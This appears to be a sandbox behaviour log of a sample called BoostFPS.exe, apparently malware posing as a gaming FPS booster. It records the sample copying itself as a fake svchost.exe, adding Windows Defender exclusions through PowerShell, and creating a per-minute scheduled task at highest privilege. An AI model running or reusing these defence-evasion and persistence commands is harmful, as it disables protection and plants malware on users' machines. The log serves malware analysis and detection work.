Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\Desktop\BoostFPS.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\FPS_BY FILMGODX.bat" "
Source: C:\Users\user\Desktop\BoostFPS.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mode.com Mode 100,25
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\System32\mode.comSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\mode.comSection loaded: ureg.dllJump to behavior
                  Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: kernel.appcore.dll
